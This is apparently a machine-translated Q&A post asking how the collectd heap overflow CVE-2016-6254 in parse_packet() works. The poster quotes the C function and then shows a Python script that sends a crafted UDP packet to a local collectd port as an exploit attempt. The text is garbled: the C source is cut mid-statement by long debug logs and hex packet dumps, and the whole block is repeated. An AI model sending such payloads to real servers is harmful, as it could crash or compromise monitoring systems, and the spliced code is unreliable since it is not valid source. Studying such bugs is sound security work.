CVE-2016-6254 - Descripción del desbordamiento de montón

1

Intentando entender este fragmento de código:

Contiene una vulnerabilidad de desbordamiento de búfer de pila:

static int parse_packet (sockent_t *se, /* {{{ */
        void *buffer, size_t buffer_size, int flags,
        const char *username)
{
    int status;

    value_list_t vl = VALUE_LIST_INIT;
    notification_t n;

#if HAVE_LIBGCRYPT
    int packet_was_signed = (flags & PP_SIGNED);
        int packet_was_encrypted = (flags & PP_ENCRYPTED);
    int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */


    memset (&vl, '
  parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl)); memset (&n, '
option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n)); status = 0; while ((status == 0) && (0 < buffer_size) && ((unsigned int) buffer_size > sizeof (part_header_t))) { uint16_t pkg_length; uint16_t pkg_type; memcpy ((void *) &pkg_type, (void *) buffer, sizeof (pkg_type)); memcpy ((void *) &pkg_length, (void *) (buffer + sizeof (pkg_type)), sizeof (pkg_length)); pkg_length = ntohs (pkg_length); pkg_type = ntohs (pkg_type); if (pkg_length > buffer_size) break; /* Ensure that this loop terminates eventually */ if (pkg_length < (2 * sizeof (uint16_t))) break; if (pkg_type == TYPE_ENCR_AES256) { status = parse_part_encr_aes256 (se, &buffer, &buffer_size, flags); if (status != 0) { ERROR ("network plugin: Decrypting AES256 " "part failed " "with status %i.", status); break; } } #if HAVE_LIBGCRYPT else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT) && (packet_was_encrypted == 0)) { if (printed_ignore_warning == 0) { INFO ("network plugin: Unencrypted packet or " "part has been ignored."); printed_ignore_warning = 1; } buffer = ((char *) buffer) + pkg_length; continue; } #endif /* HAVE_LIBGCRYPT */ else if (pkg_type == TYPE_SIGN_SHA256) { status = parse_part_sign_sha256 (se, &buffer, &buffer_size, flags); if (status != 0) { ERROR ("network plugin: Verifying HMAC-SHA-256 " "signature failed " "with status %i.", status); break; } } #if HAVE_LIBGCRYPT else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN) && (packet_was_encrypted == 0) && (packet_was_signed == 0)) { if (printed_ignore_warning == 0) { INFO ("network plugin: Unsigned packet or " "part has been ignored."); printed_ignore_warning = 1; } buffer = ((char *) buffer) + pkg_length; continue; } #endif /* HAVE_LIBGCRYPT */ else if (pkg_type == TYPE_VALUES) { status = parse_part_values (&buffer, &buffer_size, &vl.values, &vl.values_len); if (status != 0) break; network_dispatch_values (&vl, username); sfree (vl.values); } else if (pkg_type == TYPE_TIME) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) { vl.time = TIME_T_TO_CDTIME_T (tmp); n.time = TIME_T_TO_CDTIME_T (tmp); } } else if (pkg_type == TYPE_TIME_HR) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) { vl.time = (cdtime_t) tmp; n.time = (cdtime_t) tmp; } } else if (pkg_type == TYPE_INTERVAL) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) vl.interval = TIME_T_TO_CDTIME_T (tmp); } else if (pkg_type == TYPE_INTERVAL_HR) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) vl.interval = (cdtime_t) tmp; } else if (pkg_type == TYPE_HOST) { status = parse_part_string (&buffer, &buffer_size, vl.host, sizeof (vl.host)); if (status == 0) sstrncpy (n.host, vl.host, sizeof (n.host)); } else if (pkg_type == TYPE_PLUGIN) { status = parse_part_string (&buffer, &buffer_size, vl.plugin, sizeof (vl.plugin)); if (status == 0) sstrncpy (n.plugin, vl.plugin, sizeof (n.plugin)); } else if (pkg_type == TYPE_PLUGIN_INSTANCE) { status = parse_part_string (&buffer, &buffer_size, vl.plugin_instance, sizeof (vl.plugin_instance)); if (status == 0) sstrncpy (n.plugin_instance, vl.plugin_instance, sizeof (n.plugin_instance)); } else if (pkg_type == TYPE_TYPE) { status = parse_part_string (&buffer, &buffer_size, vl.type, sizeof (vl.type)); if (status == 0) sstrncpy (n.type, vl.type, sizeof (n.type)); } else if (pkg_type == TYPE_TYPE_INSTANCE) { status = parse_part_string (&buffer, &buffer_size, vl.type_instance, sizeof (vl.type_instance)); if (status == 0) sstrncpy (n.type_instance, vl.type_instance, sizeof (n.type_instance)); } else if (pkg_type == TYPE_MESSAGE) { status = parse_part_string (&buffer, &buffer_size, n.message, sizeof (n.message)); if (status != 0) { /* do nothing */ } else if ((n.severity != NOTIF_FAILURE) && (n.severity != NOTIF_WARNING) && (n.severity != NOTIF_OKAY)) { INFO ("network plugin: " "Ignoring notification with " "unknown severity %i.", n.severity); } else if (n.time <= 0) { INFO ("network plugin: " "Ignoring notification with " "time == 0."); } else if (strlen (n.message) <= 0) { INFO ("network plugin: " "Ignoring notification with " "an empty message."); } else { plugin_dispatch_notification (&n); } } else if (pkg_type == TYPE_SEVERITY) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) n.severity = (int) tmp; } else { DEBUG ("network plugin: parse_packet: Unknown part" " type: 0x%04hx", pkg_type); buffer = ((char *) buffer) + pkg_length; } } /* while (buffer_size > sizeof (part_header_t)) */ if (status == 0 && buffer_size > 0) WARNING ("network plugin: parse_packet: Received truncated " "packet, try increasing 'MaxPacketSize'"); return (status); } /* }}} int parse_packet */

Fue parcheado con esto:

enlace

Pasé un tiempo investigándolo pero no puedo encontrar el error ...

¿Alguien puede ayudar?

Actualización 1:

Gracias por las respuestas, especialmente @grochmal

Mi intento de hacer un desbordamiento de búfer / desbordamiento de pila:

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET, # Internet
             socket.SOCK_DGRAM) # UDP

str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"


sock.sendto(str,(UDP_IP, UDP_PORT))

Pero de alguna manera no puedo pasar el búfer ... si configuro el pkg_lenght en el último paquete a 67, obtengo esto:

static int parse_packet (sockent_t *se, /* {{{ */
        void *buffer, size_t buffer_size, int flags,
        const char *username)
{
    int status;

    value_list_t vl = VALUE_LIST_INIT;
    notification_t n;

#if HAVE_LIBGCRYPT
    int packet_was_signed = (flags & PP_SIGNED);
        int packet_was_encrypted = (flags & PP_ENCRYPTED);
    int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */


    memset (&vl, '
  parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl)); memset (&n, '
option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
